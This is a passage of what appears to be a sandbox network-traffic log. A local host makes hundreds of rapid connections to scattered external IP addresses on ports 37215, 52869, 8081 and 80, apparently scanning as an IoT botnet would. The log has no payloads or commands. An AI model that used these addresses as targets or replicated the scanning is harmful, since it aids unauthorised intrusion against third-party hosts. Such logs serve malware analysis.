                                                Jul 20, 2024 23:05:33.489573002 CEST80814092819.66.111.46192.168.2.14
                                                Jul 20, 2024 23:05:33.489656925 CEST409288081192.168.2.1419.66.111.46
                                                Jul 20, 2024 23:05:33.491086960 CEST52869560964.162.121.105192.168.2.14
                                                Jul 20, 2024 23:05:33.491127968 CEST5609652869192.168.2.144.162.121.105
                                                Jul 20, 2024 23:05:33.491704941 CEST804617695.236.83.119192.168.2.14
                                                Jul 20, 2024 23:05:33.492044926 CEST4617680192.168.2.1495.236.83.119
                                                Jul 20, 2024 23:05:33.492562056 CEST80813689464.8.192.151192.168.2.14
                                                Jul 20, 2024 23:05:33.493175030 CEST3721533640197.223.52.137192.168.2.14
                                                Jul 20, 2024 23:05:33.493212938 CEST3914280192.168.2.1495.220.228.215
                                                Jul 20, 2024 23:05:33.493212938 CEST3914280192.168.2.1495.220.228.215
                                                Jul 20, 2024 23:05:33.493242025 CEST3364037215192.168.2.14197.223.52.137
                                                Jul 20, 2024 23:05:33.494154930 CEST372608081192.168.2.1464.8.192.151
                                                Jul 20, 2024 23:05:33.496962070 CEST805407495.17.124.99192.168.2.14
                                                Jul 20, 2024 23:05:33.496970892 CEST808159872124.201.188.99192.168.2.14
                                                Jul 20, 2024 23:05:33.496977091 CEST80815756414.227.196.59192.168.2.14
                                                Jul 20, 2024 23:05:33.497477055 CEST5217637215192.168.2.14198.80.229.185
                                                Jul 20, 2024 23:05:33.497605085 CEST3956280192.168.2.1495.220.228.215
                                                Jul 20, 2024 23:05:33.498076916 CEST803914295.220.228.215192.168.2.14
                                                Jul 20, 2024 23:05:33.498150110 CEST350968081192.168.2.1497.4.105.89
                                                Jul 20, 2024 23:05:33.498150110 CEST350968081192.168.2.1497.4.105.89
                                                Jul 20, 2024 23:05:33.499025106 CEST80813726064.8.192.151192.168.2.14
                                                Jul 20, 2024 23:05:33.499105930 CEST372608081192.168.2.1464.8.192.151
                                                Jul 20, 2024 23:05:33.502252102 CEST5495880192.168.2.1495.85.128.197
                                                Jul 20, 2024 23:05:33.502276897 CEST5495880192.168.2.1495.85.128.197
                                                Jul 20, 2024 23:05:33.502310991 CEST3721552176198.80.229.185192.168.2.14
                                                Jul 20, 2024 23:05:33.502461910 CEST803956295.220.228.215192.168.2.14
                                                Jul 20, 2024 23:05:33.502851009 CEST3956280192.168.2.1495.220.228.215
                                                Jul 20, 2024 23:05:33.502856016 CEST5217637215192.168.2.14198.80.229.185
                                                Jul 20, 2024 23:05:33.503171921 CEST354628081192.168.2.1497.4.105.89
                                                Jul 20, 2024 23:05:33.503807068 CEST4714252869192.168.2.14153.104.11.80
                                                Jul 20, 2024 23:05:33.503988981 CEST80813509697.4.105.89192.168.2.14
                                                Jul 20, 2024 23:05:33.505458117 CEST803763295.119.118.209192.168.2.14
                                                Jul 20, 2024 23:05:33.505464077 CEST803466295.59.134.24192.168.2.14
                                                Jul 20, 2024 23:05:33.505471945 CEST808156470154.14.145.41192.168.2.14
                                                Jul 20, 2024 23:05:33.506086111 CEST5938637215192.168.2.14157.32.82.175
                                                Jul 20, 2024 23:05:33.507116079 CEST5537880192.168.2.1495.85.128.197
                                                Jul 20, 2024 23:05:33.507981062 CEST805495895.85.128.197192.168.2.14
                                                Jul 20, 2024 23:05:33.508126974 CEST80813546297.4.105.89192.168.2.14
                                                Jul 20, 2024 23:05:33.508163929 CEST409828081192.168.2.14221.8.209.126
                                                Jul 20, 2024 23:05:33.508163929 CEST409828081192.168.2.14221.8.209.126
                                                Jul 20, 2024 23:05:33.508172035 CEST354628081192.168.2.1497.4.105.89
                                                Jul 20, 2024 23:05:33.508857965 CEST5286947142153.104.11.80192.168.2.14
                                                Jul 20, 2024 23:05:33.508994102 CEST4714252869192.168.2.14153.104.11.80
                                                Jul 20, 2024 23:05:33.510478973 CEST5201680192.168.2.1495.104.136.90
                                                Jul 20, 2024 23:05:33.510478973 CEST5201680192.168.2.1495.104.136.90
                                                Jul 20, 2024 23:05:33.510940075 CEST413508081192.168.2.14221.8.209.126
                                                Jul 20, 2024 23:05:33.511059999 CEST3721559386157.32.82.175192.168.2.14
                                                Jul 20, 2024 23:05:33.511171103 CEST5938637215192.168.2.14157.32.82.175
                                                Jul 20, 2024 23:05:33.511558056 CEST3955037215192.168.2.14157.83.28.229
                                                Jul 20, 2024 23:05:33.511981010 CEST805537895.85.128.197192.168.2.14
                                                Jul 20, 2024 23:05:33.512058973 CEST5537880192.168.2.1495.85.128.197
                                                Jul 20, 2024 23:05:33.513039112 CEST5243680192.168.2.1495.104.136.90
                                                Jul 20, 2024 23:05:33.513209105 CEST808140982221.8.209.126192.168.2.14
                                                Jul 20, 2024 23:05:33.513355970 CEST508108081192.168.2.14160.169.251.238
                                                Jul 20, 2024 23:05:33.513355970 CEST508108081192.168.2.14160.169.251.238
                                                Jul 20, 2024 23:05:33.514908075 CEST3972852869192.168.2.1481.143.140.223
                                                Jul 20, 2024 23:05:33.515707970 CEST5639280192.168.2.1495.213.60.63
                                                Jul 20, 2024 23:05:33.515707970 CEST5639280192.168.2.1495.213.60.63
                                                Jul 20, 2024 23:05:33.516387939 CEST805201695.104.136.90192.168.2.14
                                                Jul 20, 2024 23:05:33.516469002 CEST808141350221.8.209.126192.168.2.14
                                                Jul 20, 2024 23:05:33.516494036 CEST511808081192.168.2.14160.169.251.238
                                                Jul 20, 2024 23:05:33.516606092 CEST413508081192.168.2.14221.8.209.126
                                                Jul 20, 2024 23:05:33.516695976 CEST4205037215192.168.2.14157.62.62.113
                                                Jul 20, 2024 23:05:33.516781092 CEST3721539550157.83.28.229192.168.2.14
                                                Jul 20, 2024 23:05:33.516824961 CEST3955037215192.168.2.14157.83.28.229
                                                Jul 20, 2024 23:05:33.516972065 CEST803784495.189.164.11192.168.2.14
                                                Jul 20, 2024 23:05:33.517076969 CEST80815118472.133.157.196192.168.2.14
                                                Jul 20, 2024 23:05:33.517083883 CEST803720495.61.168.150192.168.2.14
                                                Jul 20, 2024 23:05:33.517090082 CEST808151662117.59.50.117192.168.2.14
                                                Jul 20, 2024 23:05:33.518034935 CEST805243695.104.136.90192.168.2.14
                                                Jul 20, 2024 23:05:33.518121958 CEST5243680192.168.2.1495.104.136.90
                                                Jul 20, 2024 23:05:33.518234015 CEST808150810160.169.251.238192.168.2.14
                                                Jul 20, 2024 23:05:33.518903017 CEST5681480192.168.2.1495.213.60.63
                                                Jul 20, 2024 23:05:33.519725084 CEST528693972881.143.140.223192.168.2.14
                                                Jul 20, 2024 23:05:33.519738913 CEST529148081192.168.2.1442.126.204.24
                                                Jul 20, 2024 23:05:33.519738913 CEST529148081192.168.2.1442.126.204.24
                                                Jul 20, 2024 23:05:33.519804001 CEST3972852869192.168.2.1481.143.140.223
                                                Jul 20, 2024 23:05:33.520549059 CEST805639295.213.60.63192.168.2.14
                                                Jul 20, 2024 23:05:33.521389961 CEST5732237215192.168.2.14176.171.193.242
                                                Jul 20, 2024 23:05:33.521920919 CEST808151180160.169.251.238192.168.2.14
                                                Jul 20, 2024 23:05:33.521939039 CEST5169480192.168.2.1495.57.6.186
                                                Jul 20, 2024 23:05:33.521939039 CEST5169480192.168.2.1495.57.6.186
                                                Jul 20, 2024 23:05:33.522010088 CEST511808081192.168.2.14160.169.251.238
                                                Jul 20, 2024 23:05:33.522500992 CEST532828081192.168.2.1442.126.204.24
                                                Jul 20, 2024 23:05:33.522536993 CEST3721542050157.62.62.113192.168.2.14
                                                Jul 20, 2024 23:05:33.522619009 CEST4205037215192.168.2.14157.62.62.113
                                                Jul 20, 2024 23:05:33.523233891 CEST442648081192.168.2.1465.131.57.149
                                                Jul 20, 2024 23:05:33.523233891 CEST442648081192.168.2.1465.131.57.149
                                                Jul 20, 2024 23:05:33.524117947 CEST805681495.213.60.63192.168.2.14
                                                Jul 20, 2024 23:05:33.524238110 CEST5681480192.168.2.1495.213.60.63
                                                Jul 20, 2024 23:05:33.525007963 CEST805620095.100.201.122192.168.2.14
                                                Jul 20, 2024 23:05:33.525069952 CEST808145306141.98.245.55192.168.2.14
                                                Jul 20, 2024 23:05:33.525685072 CEST80815291442.126.204.24192.168.2.14
                                                Jul 20, 2024 23:05:33.525691032 CEST5211480192.168.2.1495.57.6.186
                                                Jul 20, 2024 23:05:33.526329041 CEST3721557322176.171.193.242192.168.2.14
                                                Jul 20, 2024 23:05:33.526595116 CEST5732237215192.168.2.14176.171.193.242
                                                Jul 20, 2024 23:05:33.526711941 CEST446328081192.168.2.1465.131.57.149
                                                Jul 20, 2024 23:05:33.526746035 CEST805169495.57.6.186192.168.2.14
                                                Jul 20, 2024 23:05:33.527385950 CEST4517252869192.168.2.14210.29.223.179
                                                Jul 20, 2024 23:05:33.527496099 CEST80815328242.126.204.24192.168.2.14
                                                Jul 20, 2024 23:05:33.527853966 CEST532828081192.168.2.1442.126.204.24
                                                Jul 20, 2024 23:05:33.528110027 CEST80814426465.131.57.149192.168.2.14
                                                Jul 20, 2024 23:05:33.529063940 CEST80814056219.66.111.46192.168.2.14
                                                Jul 20, 2024 23:05:33.530837059 CEST805211495.57.6.186192.168.2.14
                                                Jul 20, 2024 23:05:33.530939102 CEST5211480192.168.2.1495.57.6.186
                                                Jul 20, 2024 23:05:33.531703949 CEST3414037215192.168.2.14157.25.209.247
                                                Jul 20, 2024 23:05:33.531707048 CEST80814463265.131.57.149192.168.2.14
                                                Jul 20, 2024 23:05:33.532026052 CEST446328081192.168.2.1465.131.57.149
                                                Jul 20, 2024 23:05:33.532326937 CEST5286945172210.29.223.179192.168.2.14
                                                Jul 20, 2024 23:05:33.532507896 CEST4517252869192.168.2.14210.29.223.179
                                                Jul 20, 2024 23:05:33.532669067 CEST4044680192.168.2.1495.62.179.67
                                                Jul 20, 2024 23:05:33.532669067 CEST4044680192.168.2.1495.62.179.67
                                                Jul 20, 2024 23:05:33.532960892 CEST80813689464.8.192.151192.168.2.14
                                                Jul 20, 2024 23:05:33.532978058 CEST804575895.236.83.119192.168.2.14
                                                Jul 20, 2024 23:05:33.533163071 CEST396468081192.168.2.1452.83.62.134
                                                Jul 20, 2024 23:05:33.533163071 CEST396468081192.168.2.1452.83.62.134
                                                Jul 20, 2024 23:05:33.535845041 CEST4086680192.168.2.1495.62.179.67
                                                Jul 20, 2024 23:05:33.536451101 CEST400148081192.168.2.1452.83.62.134
                                                Jul 20, 2024 23:05:33.536757946 CEST3721534140157.25.209.247192.168.2.14
                                                Jul 20, 2024 23:05:33.536920071 CEST3414037215192.168.2.14157.25.209.247
                                                Jul 20, 2024 23:05:33.537326097 CEST4718637215192.168.2.14157.145.195.153
                                                Jul 20, 2024 23:05:33.538510084 CEST804044695.62.179.67192.168.2.14
                                                Jul 20, 2024 23:05:33.538639069 CEST80813964652.83.62.134192.168.2.14
                                                Jul 20, 2024 23:05:33.539514065 CEST5657080192.168.2.1495.139.191.115
                                                Jul 20, 2024 23:05:33.539515018 CEST5657080192.168.2.1495.139.191.115
                                                Jul 20, 2024 23:05:33.540108919 CEST449668081192.168.2.14162.1.131.232
                                                Jul 20, 2024 23:05:33.540108919 CEST449668081192.168.2.14162.1.131.232
                                                Jul 20, 2024 23:05:33.540997982 CEST803914295.220.228.215192.168.2.14
                                                Jul 20, 2024 23:05:33.541471958 CEST804086695.62.179.67192.168.2.14
                                                Jul 20, 2024 23:05:33.541536093 CEST4086680192.168.2.1495.62.179.67
                                                Jul 20, 2024 23:05:33.542048931 CEST80814001452.83.62.134192.168.2.14
                                                Jul 20, 2024 23:05:33.542105913 CEST400148081192.168.2.1452.83.62.134
                                                Jul 20, 2024 23:05:33.542149067 CEST4479252869192.168.2.1459.10.142.189
                                                Jul 20, 2024 23:05:33.542845011 CEST5699480192.168.2.1495.139.191.115
                                                Jul 20, 2024 23:05:33.543299913 CEST3721547186157.145.195.153192.168.2.14
                                                Jul 20, 2024 23:05:33.543370008 CEST4718637215192.168.2.14157.145.195.153
                                                Jul 20, 2024 23:05:33.543730021 CEST453368081192.168.2.14162.1.131.232
                                                Jul 20, 2024 23:05:33.543953896 CEST4630037215192.168.2.14157.14.16.110
                                                Jul 20, 2024 23:05:33.546164989 CEST4036280192.168.2.1495.41.85.63
                                                Jul 20, 2024 23:05:33.546164989 CEST4036280192.168.2.1495.41.85.63
                                                Jul 20, 2024 23:05:33.547171116 CEST350608081192.168.2.1425.156.123.151
                                                Jul 20, 2024 23:05:33.547171116 CEST350608081192.168.2.1425.156.123.151
                                                Jul 20, 2024 23:05:33.547451973 CEST805657095.139.191.115192.168.2.14
                                                Jul 20, 2024 23:05:33.547457933 CEST808144966162.1.131.232192.168.2.14
                                                Jul 20, 2024 23:05:33.547463894 CEST528694479259.10.142.189192.168.2.14
                                                Jul 20, 2024 23:05:33.547499895 CEST4479252869192.168.2.1459.10.142.189
                                                Jul 20, 2024 23:05:33.547904968 CEST805699495.139.191.115192.168.2.14
                                                Jul 20, 2024 23:05:33.548228025 CEST5699480192.168.2.1495.139.191.115
                                                Jul 20, 2024 23:05:33.548675060 CEST808145336162.1.131.232192.168.2.14
                                                Jul 20, 2024 23:05:33.548764944 CEST453368081192.168.2.14162.1.131.232
                                                Jul 20, 2024 23:05:33.548772097 CEST3721546300157.14.16.110192.168.2.14
                                                Jul 20, 2024 23:05:33.548825979 CEST4630037215192.168.2.14157.14.16.110
                                                Jul 20, 2024 23:05:33.549226999 CEST5009437215192.168.2.14157.104.80.16
                                                Jul 20, 2024 23:05:33.549397945 CEST4078680192.168.2.1495.41.85.63
                                                Jul 20, 2024 23:05:33.549746990 CEST354288081192.168.2.1425.156.123.151
                                                Jul 20, 2024 23:05:33.551127911 CEST804036295.41.85.63192.168.2.14
                                                Jul 20, 2024 23:05:33.552160025 CEST80813506025.156.123.151192.168.2.14
                                                Jul 20, 2024 23:05:33.552613020 CEST4351080192.168.2.1495.232.173.19
                                                Jul 20, 2024 23:05:33.552613020 CEST4351080192.168.2.1495.232.173.19
                                                Jul 20, 2024 23:05:33.552970886 CEST805495895.85.128.197192.168.2.14
                                                Jul 20, 2024 23:05:33.553097010 CEST80813509697.4.105.89192.168.2.14
                                                Jul 20, 2024 23:05:33.553235054 CEST563768081192.168.2.1472.126.240.254
                                                Jul 20, 2024 23:05:33.553235054 CEST563768081192.168.2.1472.126.240.254
                                                Jul 20, 2024 23:05:33.553334951 CEST4367452869192.168.2.1498.74.12.225
                                                Jul 20, 2024 23:05:33.554214001 CEST3721550094157.104.80.16192.168.2.14
                                                Jul 20, 2024 23:05:33.554286003 CEST5009437215192.168.2.14157.104.80.16
                                                Jul 20, 2024 23:05:33.554301977 CEST804078695.41.85.63192.168.2.14
                                                Jul 20, 2024 23:05:33.554357052 CEST4078680192.168.2.1495.41.85.63
                                                Jul 20, 2024 23:05:33.554764986 CEST80813542825.156.123.151192.168.2.14
                                                Jul 20, 2024 23:05:33.554806948 CEST354288081192.168.2.1425.156.123.151
                                                Jul 20, 2024 23:05:33.555254936 CEST4133437215192.168.2.1441.112.53.44
                                                Jul 20, 2024 23:05:33.555766106 CEST4393680192.168.2.1495.232.173.19
                                                Jul 20, 2024 23:05:33.556508064 CEST567448081192.168.2.1472.126.240.254
                                                Jul 20, 2024 23:05:33.557071924 CEST805201695.104.136.90192.168.2.14
                                                Jul 20, 2024 23:05:33.557077885 CEST808140982221.8.209.126192.168.2.14
                                                Jul 20, 2024 23:05:33.557589054 CEST804351095.232.173.19192.168.2.14
                                                Jul 20, 2024 23:05:33.558114052 CEST80815637672.126.240.254192.168.2.14
                                                Jul 20, 2024 23:05:33.558341026 CEST528694367498.74.12.225192.168.2.14
                                                Jul 20, 2024 23:05:33.558403969 CEST4367452869192.168.2.1498.74.12.225
                                                Jul 20, 2024 23:05:33.559508085 CEST3934080192.168.2.1495.36.201.87
                                                Jul 20, 2024 23:05:33.559508085 CEST3934080192.168.2.1495.36.201.87
                                                Jul 20, 2024 23:05:33.560436010 CEST596768081192.168.2.1481.104.141.158
                                                Jul 20, 2024 23:05:33.560436010 CEST596768081192.168.2.1481.104.141.158
                                                Jul 20, 2024 23:05:33.560652971 CEST372154133441.112.53.44192.168.2.14
                                                Jul 20, 2024 23:05:33.560758114 CEST4133437215192.168.2.1441.112.53.44
                                                Jul 20, 2024 23:05:33.560847044 CEST5622837215192.168.2.14157.68.215.138
                                                Jul 20, 2024 23:05:33.560937881 CEST804393695.232.173.19192.168.2.14
                                                Jul 20, 2024 23:05:33.560944080 CEST805639295.213.60.63192.168.2.14
                                                Jul 20, 2024 23:05:33.560977936 CEST808150810160.169.251.238192.168.2.14
                                                Jul 20, 2024 23:05:33.561345100 CEST4393680192.168.2.1495.232.173.19
                                                Jul 20, 2024 23:05:33.561358929 CEST80815674472.126.240.254192.168.2.14
                                                Jul 20, 2024 23:05:33.561424971 CEST567448081192.168.2.1472.126.240.254
                                                Jul 20, 2024 23:05:33.563929081 CEST3976280192.168.2.1495.36.201.87
                                                Jul 20, 2024 23:05:33.564373016 CEST803934095.36.201.87192.168.2.14
                                                Jul 20, 2024 23:05:33.565028906 CEST600468081192.168.2.1481.104.141.158
                                                Jul 20, 2024 23:05:33.565277100 CEST80815967681.104.141.158192.168.2.14
                                                Jul 20, 2024 23:05:33.565701008 CEST3721556228157.68.215.138192.168.2.14
                                                Jul 20, 2024 23:05:33.565855026 CEST5622837215192.168.2.14157.68.215.138
                                                Jul 20, 2024 23:05:33.566718102 CEST3427652869192.168.2.14117.129.252.99
                                                Jul 20, 2024 23:05:33.567370892 CEST5569280192.168.2.1495.55.62.244
                                                Jul 20, 2024 23:05:33.567370892 CEST5569280192.168.2.1495.55.62.244
                                                Jul 20, 2024 23:05:33.568341970 CEST569068081192.168.2.14168.224.43.165
                                                Jul 20, 2024 23:05:33.568341970 CEST569068081192.168.2.14168.224.43.165
                                                Jul 20, 2024 23:05:33.568609953 CEST5144237215192.168.2.1441.21.217.171
                                                Jul 20, 2024 23:05:33.568862915 CEST803976295.36.201.87192.168.2.14
                                                Jul 20, 2024 23:05:33.568917036 CEST3976280192.168.2.1495.36.201.87
                                                Jul 20, 2024 23:05:33.569943905 CEST80816004681.104.141.158192.168.2.14
                                                Jul 20, 2024 23:05:33.570009947 CEST600468081192.168.2.1481.104.141.158
                                                Jul 20, 2024 23:05:33.570070028 CEST5611680192.168.2.1495.55.62.244
                                                Jul 20, 2024 23:05:33.570651054 CEST572768081192.168.2.14168.224.43.165
                                                Jul 20, 2024 23:05:33.571816921 CEST5286934276117.129.252.99192.168.2.14
                                                Jul 20, 2024 23:05:33.571916103 CEST3427652869192.168.2.14117.129.252.99
                                                Jul 20, 2024 23:05:33.572173119 CEST805569295.55.62.244192.168.2.14
                                                Jul 20, 2024 23:05:33.572315931 CEST6021837215192.168.2.14197.207.102.189
                                                Jul 20, 2024 23:05:33.572501898 CEST3461880192.168.2.1495.156.74.111
                                                Jul 20, 2024 23:05:33.572501898 CEST3461880192.168.2.1495.156.74.111
                                                Jul 20, 2024 23:05:33.572961092 CEST80814426465.131.57.149192.168.2.14
                                                Jul 20, 2024 23:05:33.573054075 CEST805169495.57.6.186192.168.2.14
                                                Jul 20, 2024 23:05:33.573059082 CEST80815291442.126.204.24192.168.2.14
                                                Jul 20, 2024 23:05:33.573079109 CEST540848081192.168.2.1475.195.2.205
                                                Jul 20, 2024 23:05:33.573080063 CEST540848081192.168.2.1475.195.2.205
                                                Jul 20, 2024 23:05:33.573189974 CEST808156906168.224.43.165192.168.2.14
                                                Jul 20, 2024 23:05:33.573577881 CEST372155144241.21.217.171192.168.2.14
                                                Jul 20, 2024 23:05:33.573673010 CEST5144237215192.168.2.1441.21.217.171
                                                Jul 20, 2024 23:05:33.575251102 CEST3504280192.168.2.1495.156.74.111
                                                Jul 20, 2024 23:05:33.575542927 CEST805611695.55.62.244192.168.2.14
                                                Jul 20, 2024 23:05:33.575550079 CEST808157276168.224.43.165192.168.2.14
                                                Jul 20, 2024 23:05:33.575565100 CEST544548081192.168.2.1475.195.2.205
                                                Jul 20, 2024 23:05:33.575603962 CEST572768081192.168.2.14168.224.43.165
                                                Jul 20, 2024 23:05:33.575670958 CEST5611680192.168.2.1495.55.62.244
                                                Jul 20, 2024 23:05:33.575700998 CEST5954452869192.168.2.1419.97.179.204
                                                Jul 20, 2024 23:05:33.576865911 CEST4376437215192.168.2.1441.46.124.193
                                                Jul 20, 2024 23:05:33.577153921 CEST3721560218197.207.102.189192.168.2.14
                                                Jul 20, 2024 23:05:33.577217102 CEST6021837215192.168.2.14197.207.102.189
                                                Jul 20, 2024 23:05:33.577285051 CEST5783480192.168.2.1495.158.80.43
                                                Jul 20, 2024 23:05:33.577285051 CEST5783480192.168.2.1495.158.80.43
                                                Jul 20, 2024 23:05:33.577445984 CEST803461895.156.74.111192.168.2.14
                                                Jul 20, 2024 23:05:33.577832937 CEST375048081192.168.2.14108.194.57.178
                                                Jul 20, 2024 23:05:33.577832937 CEST375048081192.168.2.14108.194.57.178
                                                Jul 20, 2024 23:05:33.577939987 CEST80815408475.195.2.205192.168.2.14
                                                Jul 20, 2024 23:05:33.579900980 CEST5825880192.168.2.1495.158.80.43
                                                Jul 20, 2024 23:05:33.580390930 CEST803504295.156.74.111192.168.2.14
                                                Jul 20, 2024 23:05:33.580439091 CEST80815445475.195.2.205192.168.2.14
                                                Jul 20, 2024 23:05:33.580456018 CEST3504280192.168.2.1495.156.74.111
                                                Jul 20, 2024 23:05:33.580487013 CEST378748081192.168.2.14108.194.57.178
                                                Jul 20, 2024 23:05:33.580506086 CEST544548081192.168.2.1475.195.2.205
                                                Jul 20, 2024 23:05:33.580600977 CEST528695954419.97.179.204192.168.2.14
                                                Jul 20, 2024 23:05:33.580672026 CEST5954452869192.168.2.1419.97.179.204
                                                Jul 20, 2024 23:05:33.580988884 CEST80813964652.83.62.134192.168.2.14
                                                Jul 20, 2024 23:05:33.581053972 CEST804044695.62.179.67192.168.2.14
                                                Jul 20, 2024 23:05:33.581964970 CEST372154376441.46.124.193192.168.2.14
                                                Jul 20, 2024 23:05:33.582036018 CEST4376437215192.168.2.1441.46.124.193
                                                Jul 20, 2024 23:05:33.582210064 CEST805783495.158.80.43192.168.2.14
                                                Jul 20, 2024 23:05:33.582212925 CEST5680237215192.168.2.14197.88.18.67
                                                Jul 20, 2024 23:05:33.582432032 CEST3927480192.168.2.1495.121.142.215
                                                Jul 20, 2024 23:05:33.582432032 CEST3927480192.168.2.1495.121.142.215
                                                Jul 20, 2024 23:05:33.582792997 CEST808137504108.194.57.178192.168.2.14
                                                Jul 20, 2024 23:05:33.583050013 CEST538948081192.168.2.14210.161.174.194
                                                Jul 20, 2024 23:05:33.583050013 CEST538948081192.168.2.14210.161.174.194
                                                Jul 20, 2024 23:05:33.584465981 CEST3574852869192.168.2.14200.98.155.108
                                                Jul 20, 2024 23:05:33.584747076 CEST805825895.158.80.43192.168.2.14
                                                Jul 20, 2024 23:05:33.584829092 CEST5825880192.168.2.1495.158.80.43
                                                Jul 20, 2024 23:05:33.584920883 CEST3969880192.168.2.1495.121.142.215
                                                Jul 20, 2024 23:05:33.585289955 CEST542668081192.168.2.14210.161.174.194
                                                Jul 20, 2024 23:05:33.585335970 CEST808137874108.194.57.178192.168.2.14
                                                Jul 20, 2024 23:05:33.585380077 CEST378748081192.168.2.14108.194.57.178
                                                Jul 20, 2024 23:05:33.585772991 CEST3621437215192.168.2.14197.40.168.196
                                                Jul 20, 2024 23:05:33.587070942 CEST3721556802197.88.18.67192.168.2.14
                                                Jul 20, 2024 23:05:33.587198973 CEST5680237215192.168.2.14197.88.18.67
                                                Jul 20, 2024 23:05:33.587208986 CEST803927495.121.142.215192.168.2.14
                                                Jul 20, 2024 23:05:33.587728024 CEST3792280192.168.2.1495.115.64.83
                                                Jul 20, 2024 23:05:33.587728024 CEST3792280192.168.2.1495.115.64.83
                                                Jul 20, 2024 23:05:33.588036060 CEST808153894210.161.174.194192.168.2.14
                                                Jul 20, 2024 23:05:33.588118076 CEST405868081192.168.2.1443.140.207.90
                                                Jul 20, 2024 23:05:33.588118076 CEST405868081192.168.2.1443.140.207.90
                                                Jul 20, 2024 23:05:33.589404106 CEST805657095.139.191.115192.168.2.14
                                                Jul 20, 2024 23:05:33.589421034 CEST808144966162.1.131.232192.168.2.14
                                                Jul 20, 2024 23:05:33.589432001 CEST5286935748200.98.155.108192.168.2.14
                                                Jul 20, 2024 23:05:33.589529037 CEST3574852869192.168.2.14200.98.155.108
                                                Jul 20, 2024 23:05:33.589839935 CEST803969895.121.142.215192.168.2.14
                                                Jul 20, 2024 23:05:33.589899063 CEST3969880192.168.2.1495.121.142.215
                                                Jul 20, 2024 23:05:33.590173006 CEST3834480192.168.2.1495.115.64.83
                                                Jul 20, 2024 23:05:33.590183020 CEST808154266210.161.174.194192.168.2.14
                                                Jul 20, 2024 23:05:33.590271950 CEST542668081192.168.2.14210.161.174.194
                                                Jul 20, 2024 23:05:33.590603113 CEST409568081192.168.2.1443.140.207.90
                                                Jul 20, 2024 23:05:33.590857983 CEST5482237215192.168.2.14157.180.0.116
                                                Jul 20, 2024 23:05:33.590873957 CEST3721536214197.40.168.196192.168.2.14
                                                Jul 20, 2024 23:05:33.590909958 CEST3621437215192.168.2.14197.40.168.196
                                                Jul 20, 2024 23:05:33.592663050 CEST803792295.115.64.83192.168.2.14
                                                Jul 20, 2024 23:05:33.592665911 CEST4706280192.168.2.1495.31.158.7
                                                Jul 20, 2024 23:05:33.592665911 CEST4706280192.168.2.1495.31.158.7
                                                Jul 20, 2024 23:05:33.592943907 CEST80814058643.140.207.90192.168.2.14
                                                Jul 20, 2024 23:05:33.592950106 CEST80813506025.156.123.151192.168.2.14
                                                Jul 20, 2024 23:05:33.592953920 CEST804036295.41.85.63192.168.2.14
                                                Jul 20, 2024 23:05:33.593224049 CEST466888081192.168.2.14123.249.239.40
                                                Jul 20, 2024 23:05:33.593224049 CEST466888081192.168.2.14123.249.239.40
                                                Jul 20, 2024 23:05:33.593342066 CEST4649052869192.168.2.14134.214.175.73
                                                Jul 20, 2024 23:05:33.595057011 CEST803834495.115.64.83192.168.2.14
                                                Jul 20, 2024 23:05:33.595062971 CEST5817637215192.168.2.1441.212.142.21
                                                Jul 20, 2024 23:05:33.595138073 CEST3834480192.168.2.1495.115.64.83
                                                Jul 20, 2024 23:05:33.595381975 CEST4749080192.168.2.1495.31.158.7
                                                Jul 20, 2024 23:05:33.595833063 CEST80814095643.140.207.90192.168.2.14
                                                Jul 20, 2024 23:05:33.595839024 CEST3721554822157.180.0.116192.168.2.14
                                                Jul 20, 2024 23:05:33.595861912 CEST470628081192.168.2.14123.249.239.40
                                                Jul 20, 2024 23:05:33.595957994 CEST409568081192.168.2.1443.140.207.90
                                                Jul 20, 2024 23:05:33.596003056 CEST5482237215192.168.2.14157.180.0.116
                                                Jul 20, 2024 23:05:33.597604036 CEST804706295.31.158.7192.168.2.14
                                                Jul 20, 2024 23:05:33.598139048 CEST4388480192.168.2.1495.59.184.231
                                                Jul 20, 2024 23:05:33.598139048 CEST4388480192.168.2.1495.59.184.231
                                                Jul 20, 2024 23:05:33.598464966 CEST808146688123.249.239.40192.168.2.14
                                                Jul 20, 2024 23:05:33.598472118 CEST5286946490134.214.175.73192.168.2.14
                                                Jul 20, 2024 23:05:33.598608971 CEST4649052869192.168.2.14134.214.175.73
                                                Jul 20, 2024 23:05:33.598886967 CEST575968081192.168.2.1470.210.95.222
                                                Jul 20, 2024 23:05:33.598886967 CEST575968081192.168.2.1470.210.95.222
                                                Jul 20, 2024 23:05:33.599935055 CEST372155817641.212.142.21192.168.2.14
                                                Jul 20, 2024 23:05:33.600001097 CEST5817637215192.168.2.1441.212.142.21
                                                Jul 20, 2024 23:05:33.600239992 CEST804749095.31.158.7192.168.2.14
                                                Jul 20, 2024 23:05:33.600281000 CEST4749080192.168.2.1495.31.158.7
                                                Jul 20, 2024 23:05:33.600784063 CEST808147062123.249.239.40192.168.2.14
                                                Jul 20, 2024 23:05:33.600837946 CEST470628081192.168.2.14123.249.239.40
                                                Jul 20, 2024 23:05:33.600908041 CEST4209237215192.168.2.1441.209.69.235
                                                Jul 20, 2024 23:05:33.600958109 CEST80815637672.126.240.254192.168.2.14
                                                Jul 20, 2024 23:05:33.601129055 CEST804351095.232.173.19192.168.2.14
                                                Jul 20, 2024 23:05:33.601135969 CEST4431080192.168.2.1495.59.184.231
                                                Jul 20, 2024 23:05:33.601607084 CEST579668081192.168.2.1470.210.95.222
                                                Jul 20, 2024 23:05:33.603080988 CEST804388495.59.184.231192.168.2.14
                                                Jul 20, 2024 23:05:33.603430033 CEST4704652869192.168.2.14192.216.183.201
                                                Jul 20, 2024 23:05:33.603801012 CEST80815759670.210.95.222192.168.2.14
                                                Jul 20, 2024 23:05:33.603977919 CEST5688280192.168.2.1495.57.115.181
                                                Jul 20, 2024 23:05:33.603977919 CEST5688280192.168.2.1495.57.115.181
                                                Jul 20, 2024 23:05:33.604518890 CEST508768081192.168.2.14137.216.162.82
                                                Jul 20, 2024 23:05:33.604518890 CEST508768081192.168.2.14137.216.162.82
                                                Jul 20, 2024 23:05:33.604928970 CEST803934095.36.201.87192.168.2.14
                                                Jul 20, 2024 23:05:33.605871916 CEST372154209241.209.69.235192.168.2.14
                                                Jul 20, 2024 23:05:33.605918884 CEST4209237215192.168.2.1441.209.69.235
                                                Jul 20, 2024 23:05:33.606183052 CEST804431095.59.184.231192.168.2.14
                                                Jul 20, 2024 23:05:33.606239080 CEST4431080192.168.2.1495.59.184.231
                                                Jul 20, 2024 23:05:33.606240034 CEST5415837215192.168.2.14197.237.152.228
                                                Jul 20, 2024 23:05:33.606575966 CEST80815796670.210.95.222192.168.2.14
                                                Jul 20, 2024 23:05:33.606699944 CEST5730880192.168.2.1495.57.115.181
